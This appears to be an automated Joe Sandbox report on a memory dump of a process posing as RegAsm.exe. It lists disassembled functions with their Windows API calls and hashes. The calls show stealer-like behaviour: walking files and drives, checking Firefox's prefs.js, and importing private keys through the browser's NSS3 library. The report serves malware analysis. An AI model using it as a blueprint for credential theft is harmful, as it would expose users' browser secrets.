                                                                                                                                                                                                                                                                  • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                                                                                                                                                                                                  • String ID: B
                                                                                                                                                                                                                                                                  • API String ID: 1244342732-1255198513
                                                                                                                                                                                                                                                                  • Opcode ID: ccdbc191d3a2b05b56bf87e41fe33da18bf4983344432a353e0323b893537a71
                                                                                                                                                                                                                                                                  • Instruction ID: ab3e97ed26130ca04d3e0a3de3557a863076b82cdeec9429843be189f46c5c0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccdbc191d3a2b05b56bf87e41fe33da18bf4983344432a353e0323b893537a71
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D526A70904288EADF15E7A4D956BDDBBB46F29308F1440BEE449732C2DB781B4CCB66
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040B907
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: _EH_prolog.MSVCRT ref: 0040B4BB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B53A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B55E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B578
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B4B6: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B614
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                                                                                                                                                                                                                  • String ID: \..\
                                                                                                                                                                                                                                                                  • API String ID: 271224408-4220915743
                                                                                                                                                                                                                                                                  • Opcode ID: f4b71888e373d1d7525e2025da1a8349b08a96917bae4b7b5e881cd22512136c
                                                                                                                                                                                                                                                                  • Instruction ID: 13f01921bcb38fc455ff60f4a5cd3831ac87943c681481868211784bb0e97aa5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4b71888e373d1d7525e2025da1a8349b08a96917bae4b7b5e881cd22512136c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0A16F71900288AACF14EBA5D556BDDBBB4AF15308F54407EE845736C2EB781B0CCBA6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: o@
                                                                                                                                                                                                                                                                  • API String ID: 0-3135860391
                                                                                                                                                                                                                                                                  • Opcode ID: 223f040fe90e85e3005b97b97141ae9f070b96e40fee60f84169d2a2138623e7
                                                                                                                                                                                                                                                                  • Instruction ID: 84a018e018659c41e8b0146644e5ccd4e70663ba36b0048f66b527bed373fe31
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 223f040fe90e85e3005b97b97141ae9f070b96e40fee60f84169d2a2138623e7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D411671A0461AAFCF14AF94D9809AFBBB5EB04314F10447FEA15B7391D6389A80CF59
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405EEB), ref: 00405E3B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 544645111-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: d394932d53474e30a5efacc4d8c3eb3066922152f0b26aefe9648a07a82f7e33
                                                                                                                                                                                                                                                                  • Instruction ID: ff1c9841f155af56c2f4a372c586dd6ddee268370cde9542f2add13d0cc1f1b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d394932d53474e30a5efacc4d8c3eb3066922152f0b26aefe9648a07a82f7e33
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE118C71510909ABDB24CF94E588BABF7E4FB04344F604437D581E26C0D7789B85DFAA
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SHFileOperationA.SHELL32(?), ref: 0041126F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileOperation
                                                                                                                                                                                                                                                                  • String ID: YrA
                                                                                                                                                                                                                                                                  • API String ID: 3080627654-2164172383
                                                                                                                                                                                                                                                                  • Opcode ID: 280da3326f968bdc4fbaf2a59c3f7cc4d1da38da12285f65e417dab7424ef2ae
                                                                                                                                                                                                                                                                  • Instruction ID: b04a682756f7d26cd4957ddb72d3e33d7f64999a516e6058490045f1c481612b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 280da3326f968bdc4fbaf2a59c3f7cc4d1da38da12285f65e417dab7424ef2ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9E052B0E0421D9FCB44EFA9E9456EEBAF4AF48308F40806AD519E7240E7B456458BA9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104FB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentProfile
                                                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                                                  • API String ID: 2104809126-1654365787
                                                                                                                                                                                                                                                                  • Opcode ID: bf28a4a0c6ad0aab3922940691f89e9df55f47749f7a1b52cc4efa55eb609e81
                                                                                                                                                                                                                                                                  • Instruction ID: 3ae3486a326379ad06c001b6fe43eaa520331b8a67875df45668faa9552b6485
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf28a4a0c6ad0aab3922940691f89e9df55f47749f7a1b52cc4efa55eb609e81
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79E0EC70A0010DBBDB20DEA4D955B9D77ACAB04748F508025E941E2181DBB8D689DBA9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AttributesFileH_prolog
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3244726999-0
                                                                                                                                                                                                                                                                  • Opcode ID: e9247a96475f21c435104b1576c3d224e519b3060484702e6ba07ea2b90f97aa
                                                                                                                                                                                                                                                                  • Instruction ID: b203f50d24e504eb0f28bc6b24f46a56a06a5c8a305458894914663eac43b770
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9247a96475f21c435104b1576c3d224e519b3060484702e6ba07ea2b90f97aa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96E09234900518ABCB14EF64C5456CC7724FF01764F10836FEC72A26D1DB388A86CA84
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405EA8,00000000,00000000), ref: 00405B05
                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405EA8,00000000,00000000), ref: 00405B31
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                  • Opcode ID: ef9e616107430d77fd001a40b7e67720167dd967026149857909ede2e788de90
                                                                                                                                                                                                                                                                  • Instruction ID: 8b246569a91d498fdde8d9096e1c7904f0a18a558dbadbecc3a6c047a34df5fb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef9e616107430d77fd001a40b7e67720167dd967026149857909ede2e788de90
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0021A171740B049BCB24CF74CD81B9BB7F9EB41314F24092AE61AD72D0E678A980CE18
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040D453
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: _EH_prolog.MSVCRT ref: 0040C1DF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C232
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1DA: memcmp.MSVCRT ref: 0040C270
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2375657845-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7c197755c0485ce24ad81b958bb994dff541be477c51968cb0f1c643c7bb1cad
                                                                                                                                                                                                                                                                  • Instruction ID: 67a6d89e42dae1a589c4ad739d30db411377f20cfca735d1cc92dc772a9b020b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c197755c0485ce24ad81b958bb994dff541be477c51968cb0f1c643c7bb1cad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55915A71900248EADF11EBE5D946BDEBBB8AF15308F10417FE44573282EA78570C8BA6
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040A8EB
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00409FC5: _EH_prolog.MSVCRT ref: 00409FCA
                                                                                                                                                                                                                                                                    • Part of subcall function 00409FC5: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 0040A049
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1592259726-0
                                                                                                                                                                                                                                                                  • Opcode ID: 32d91941147409a14a21bcd6afec0253f03cf6d386e948356a1537b8856dbace
                                                                                                                                                                                                                                                                  • Instruction ID: bf25fb03bc8260b26ad3435b50df854a9e8b5ac1992e2269c35b06e2c96efe23
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d91941147409a14a21bcd6afec0253f03cf6d386e948356a1537b8856dbace
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F2161B1900248EECF21EF69C5067DDBBB4AF45318F00416EE88463281D73957488BE7
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00401EDB
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                                                                                                                                                                                                                    • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00415B43
                                                                                                                                                                                                                                                                    • Part of subcall function 00412D48: _EH_prolog.MSVCRT ref: 00412D4D
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: _EH_prolog.MSVCRT ref: 0041594C
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004159AE
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: memset.MSVCRT ref: 004159CD
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: GetDriveTypeA.KERNEL32(?), ref: 004159D6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: lstrcpy.KERNEL32(?,00000000), ref: 004159F6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: lstrcpy.KERNEL32(?,00000000), ref: 00415A37
                                                                                                                                                                                                                                                                    • Part of subcall function 00415947: lstrlenA.KERNEL32(?), ref: 00415A9C
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C977C33
                                                                                                                                                                                                                                                                  • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C977C66
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(00000000), ref: 6C977D1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: SECOID_FindOID_Util.NSS3(?,?,?,6C9791C5), ref: 6C97788F
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C977D48
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C977D71
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C977DD3
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C977DE1
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C977DF8
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C977E1A
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C977E58
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9791C5), ref: 6C9778BB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C9791C5), ref: 6C9778FA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C9791C5), ref: 6C977930
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C9791C5), ref: 6C977951
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C977964
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C97797A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C977988
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C977998
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: free.MOZGLUE(00000000), ref: 6C9779A7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C9791C5), ref: 6C9779BB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C977870: PR_GetCurrentThread.NSS3(?,?,?,?,6C9791C5), ref: 6C9779CA
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C977E49
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C977F8C
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C977F98
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C977FBF
                                                                                                                                                                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C977FD9
                                                                                                                                                                                                                                                                  • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C978038
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C978050
                                                                                                                                                                                                                                                                  • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C978093
                                                                                                                                                                                                                                                                  • SECOID_FindOID_Util.NSS3 ref: 6C977F29
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C918298,?,?,?,6C90FCE5,?), ref: 6C9707BF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9707B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9707E6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C97081B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C970825
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C978072
                                                                                                                                                                                                                                                                  • SECOID_FindOID_Util.NSS3 ref: 6C9780F5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C97800A,00000000,?,00000000,?), ref: 6C97BC3F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2815116071-0
                                                                                                                                                                                                                                                                  • Opcode ID: 097ee5d04b315d69b525599fca14132eb3f651d89fc12a611c2522b11e018acb
                                                                                                                                                                                                                                                                  • Instruction ID: 2b652b30763cae8884766c9b55392e75dc7d94d6bd09c25a980fda0e3551388d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 097ee5d04b315d69b525599fca14132eb3f651d89fc12a611c2522b11e018acb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E191716063009FE725CF28C984B5A77E9EF5470CF14496DE89A9BB60E731E805CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00415F6F
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415F87
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415F8E
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415FA6
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00415FBD
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004268EC), ref: 00415FDA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004268F0), ref: 00415FF4
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00416018
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
